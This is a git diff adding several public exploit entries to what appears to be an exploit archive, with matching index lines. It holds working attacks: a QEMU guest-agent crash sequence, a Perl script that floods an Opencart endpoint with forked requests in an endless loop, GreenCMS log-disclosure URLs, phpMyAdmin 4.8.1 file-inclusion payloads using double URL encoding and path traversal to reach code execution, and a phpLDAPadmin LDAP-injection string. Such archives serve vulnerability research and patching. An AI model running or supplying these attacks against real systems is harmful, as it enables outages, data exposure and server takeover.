diff --git a/exploits/linux/dos/44925.txt b/exploits/linux/dos/44925.txt new file mode 100644 index 000000000..41849eb5e --- /dev/null +++ b/exploits/linux/dos/44925.txt @@ -0,0 +1,46 @@ +# Exploit Title: QEMU Guest Agent 2.12.50 - Denial of Service +# Date: 2018-06-07 +# Exploit Author: Fakhri Zulkifli (@d0lph1n98) +# Vendor Homepage: https://www.qemu.org/ +# Software Link: https://www.qemu.org/download/ +# Version: 2.12.50 and earlier +# Tested on: 2.12.50 +# CVE : CVE-2018-12617 + +# QEMU Guest Agent 2.12.50 and earlier has an integer overflow causing a g_malloc0() +# call to trigger a segfault() call when trying to allocate a large memory chunk. +# The vulnerability can be exploited by sending a specific QMP command to +# the agent via the listening socket. + +1st, execute the guest-agent using the following command: + +$ qemu-ga -m unix-listen -p /tmp/qga.sock -t /tmp + +2nd, on the other console, connect to the UNIX socket using socat: + +$ socat unix-connect:/tmp/qga.sock - + +3rd, enter the following QMP command: + +{"execute":"guest-file-open", "arguments":{"path":"/tmp/poc","mode":"w+”}} +{"return": 1000} +{"execute":"guest-file-read", "arguments":{"handle":1000,"count":4294967295}} + +The guest-file-read must be specified with the correct handle value (file descriptor). Different files will have different handle value. + +#0 0x5598eed0a1af in calloc /home/user/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:107 +#1 0x7f2ce5d7d770 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4f770) +#2 0x5598eed84996 in qmp_marshal_guest_file_read /home/user/qemu/qga/qapi-generated/qga-qapi-commands.c:425:14 +#3 0x5598eeda4fcf in do_qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:119:5 +#4 0x5598eeda4fcf in qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:168 +#5 0x5598eed59bff in process_command /home/user/qemu/qga/main.c:589:11 +#6 0x5598eed59bff in process_event /home/user/qemu/qga/main.c:626 +#7 0x5598eedb5f13 in json_message_process_token /home/user/qemu/qobject/json-streamer.c:105:5 +#8 0x5598eee25d9b in json_lexer_feed_char /home/user/qemu/qobject/json-lexer.c:323:13 +#9 0x5598eee25333 in json_lexer_feed /home/user/qemu/qobject/json-lexer.c:373:15 +#10 0x5598eed5a95e in channel_event_cb /home/user/qemu/qga/main.c:659:9 +#11 0x5598eed710c1 in ga_channel_client_event /home/user/qemu/qga/channel-posix.c:92:23 +#12 0x7f2ce5d78049 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a049) + +# References: +# 1. https://lists.gnu.org/archive/html/qemu-devel/2018-06/msg03385.html \ No newline at end of file diff --git a/exploits/php/dos/44927.pl b/exploits/php/dos/44927.pl new file mode 100755 index 000000000..a16e96534 --- /dev/null +++ b/exploits/php/dos/44927.pl @@ -0,0 +1,76 @@ +#!/usr/bin/perl -w +# +# Opencart <= 3.0.2.0 google_sitemap Remote Denial of Service (resource exhaustion) +# +# Copyright 2018 (c) Todor Donev +# https://ethical-hacker.org/ +# https://facebook.com/ethicalhackerorg +# +# Tested store with added more than 1000 products +# +# [todor@adamantium cartkiller]# torsocks perl killcart.pl example.com +# Opencart <= 3.0.2.0 google_sitemap Remote Denial of Service (resource exhaustion) +# Connecting example.com with 80 forks.. +# Bye, bye and good night.. +# Bye, bye and good night.. +# Bye, bye and good night.. +# ^C +# [todor@adamantium cartkiller]# +# +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# This exploit is buggy and proof of concept +# +use Parallel::ForkManager; +use LWP; +print "Opencart <= 3.0.2.0 google_sitemap Remote Denial of Service (resource exhaustion)\n"; +sub usage{ + print "usg: perl $0 \n"; + print "exmpl: perl $0 www.example.com\n"; + print "https://ethical-hacker.org/\n"; + print "https://facebook.com/ethicalhackerorg\n"; + print "Copyright 2018 (c) Todor Donev \n"; +} +if ($#ARGV < 0) { + usage; + exit; +} +my $numforks = 100; +print "Connecting $ARGV[0] with $numforks forks..\n"; +sub killcart{ +my $pm = new Parallel::ForkManager($numforks); +$|=1; +srand(time()); +for ($k=0;$k<$numforks;$k++) { +$pm->start and next; +my $browser = LWP::UserAgent ->new(ssl_opts => { verify_hostname => 0 },protocols_allowed => ['https']); +# $browser->timeout(20); + $browser->agent('Mozilla/5.0'); +my $response = $browser->get("https://$ARGV[0]/index.php?route=extension/feed/google_sitemap"); +print "Loop detected: Opencart is still vulnerable but seems server is correct configured. Change forks.\n" if($response->code eq 508); +print "Kill me! Google_Sitemap is turned off..\n" if($response->code eq 404); +print "Bye, bye and good night..\n" if(($response->code eq 503 or $response->code eq 504)); +$pm->finish; +} +$pm->wait_all_children; +} +while(1) { +killcart(); +} \ No newline at end of file diff --git a/exploits/php/webapps/44922.txt b/exploits/php/webapps/44922.txt new file mode 100644 index 000000000..133751777 --- /dev/null +++ b/exploits/php/webapps/44922.txt @@ -0,0 +1,13 @@ +# Exploit Title: GreenCMS 2.3.0603 - remote obtain sensitive information +# Date: 2018-06-21 +# Exploit Author: vr_system +# Vendor Homepage: https://github.com/GreenCMS/GreenCMS/ +# Software Link: https://github.com/GreenCMS/GreenCMS/ +# Version: GreenCMS 2.3.0603 +# Tested on: windows 7 +# CVE : CVE-2018-12604 + +# POC£ºhttp://site.com/Data/Log/year_month_day.log. +# Tested Link: +http://site.com/GreenCMS-beta/Data/Log/18_06_20.log +http://site.com/Data/Log/18_06_20.log \ No newline at end of file diff --git a/exploits/php/webapps/44924.txt b/exploits/php/webapps/44924.txt new file mode 100644 index 000000000..56a562c9b --- /dev/null +++ b/exploits/php/webapps/44924.txt @@ -0,0 +1,50 @@ +The latest version downloaded from the official website, the file name is phpMyAdmin-4.8.1-all-languages.zip + +The problem appears in /index.php + +Find 55~63 lines + +Line 61 contains include $_REQUEST['target']; + +This is obviously LFI precursor, as long as we bypass the 55 to 59 restrictions on the line + +Line 57 restricts the target parameter from beginning with index + +Line 58 limit target parameter cannot appear within $target_blacklist + +Find the definition of $target_blacklist : + +In /index.php the first of 50 lines + +As long as the target parameter is not import.php or export.php, the last limit is Core::checkPageValidity($_REQUEST['target']) + +Find the checkPageValidity method of the Core class : + +Defined in the \ libraries \ classes \ core.php on the 443 line + +The problem is in urldecode() on line 465 + +We can use this function to bypass the white list detection! + +I ? Twice url encoded as % 253f can bypass the validation! + +Payload: + +http://127.0.0.1/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../windows/wininit.ini + + +- - - + +I thought the loophole was over, because I didn't find out where phpmyadmin could perform file operations to implement Getshell . After several weeks of inspiration, I thought of a way to get Shell without writing files . + +We all know that after login phpmyadmin , the database is completely controllable, then we can write the WebShell to the database and then include the database file? + +Tested locally, I found that if you use WebShell as the field value of the data table can be perfectly written to the database file: + +Find the corresponding database file: + +Include: + +Payload: + +http://127.0.0.1/phpmyadmin/index.php?a=phpinfo();&target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/hack/hack.frm \ No newline at end of file diff --git a/exploits/php/webapps/44926.txt b/exploits/php/webapps/44926.txt new file mode 100644 index 000000000..365b2235c --- /dev/null +++ b/exploits/php/webapps/44926.txt @@ -0,0 +1,27 @@ +# Exploit Title: phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username) +# Google Dork:N/A +# Date: 21.06.2018 +# Exploit Author: Berk Dusunur +# Vendor Homepage: http://phpldapadmin.sourceforge.net +# Software Link: http://phpldapadmin.sourceforge.net +# Version: 1.2.2 +# Tested on: Pardus / Debian Web Server +# CVE : N/A + +#Vulnerable Code +$server = +$_SESSION[APPCONFIG]->getServer(get_request('server_id','REQUEST')); + if (count($server->untested())) + system_message(array( + +#Payload + +!(()&&!|*|*| + +#PoC 1 + +http://target/phpldapadmin/cmd.php?cmd=login_form&server_id=1!(()&&!|*|*|&redirect=true + +#PoC 2 + +login panel username use !(()&&!|*|*| password !(()&&!|*|*| \ No newline at end of file diff --git a/exploits/php/webapps/44928.txt b/exploits/php/webapps/44928.txt new file mode 100644 index 000000000..6045f6a17 --- /dev/null +++ b/exploits/php/webapps/44928.txt @@ -0,0 +1,12 @@ +# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution +# Date: 2018-06-21 +# Exploit Author: VulnSpy +# Vendor Homepage: http://www.phpmyadmin.net +# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz +# Version: 4.8.0, 4.8.1 +# Tested on: php7 mysql5 +# CVE : CVE-2018-12613 + +1. Run SQL Query : select '' +2. Include the session file : +http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b74cfdfae..900504871 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6003,6 +6003,8 @@ id,file,description,date,author,type,platform,port 44909,exploits/linux/dos/44909.txt,"ntp 4.2.8p11 - Local Buffer Overflow (PoC)",2018-06-20,"Fakhri Zulkifli",dos,linux, 44914,exploits/windows/dos/44914.txt,"Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation",2018-06-20,"Google Security Research",dos,windows, 44915,exploits/windows/dos/44915.txt,"Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows, +44925,exploits/linux/dos/44925.txt,"QEMU Guest Agent 2.12.50 - Denial of Service",2018-06-22,"Fakhri Zulkifli",dos,linux, +44927,exploits/php/dos/44927.pl,"Opencart < 3.0.2.0 - Denial of Service",2018-06-22,"Todor Donev",dos,php,80 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -39576,3 +39578,7 @@ id,file,description,date,author,type,platform,port 44917,exploits/windows/webapps/44917.txt,"VideoInsight WebClient 5 - SQL Injection",2018-06-20,vosec,webapps,windows,80 44918,exploits/php/webapps/44918.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)",2018-06-21,bay0net,webapps,php,80 44919,exploits/php/webapps/44919.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add Admin)",2018-06-21,bay0net,webapps,php,80 +44922,exploits/php/webapps/44922.txt,"GreenCMS 2.3.0603 - Information Disclosure",2018-06-22,vr_system,webapps,php, +44924,exploits/php/webapps/44924.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion",2018-06-21,ChaMd5,webapps,php, +44926,exploits/php/webapps/44926.txt,"phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)",2018-06-22,"Berk Dusunur",webapps,php,80 +44928,exploits/php/webapps/44928.txt,"phpMyAdmin 4.8.1 - Local File Inclusion",2018-06-22,VulnSpy,webapps,php,80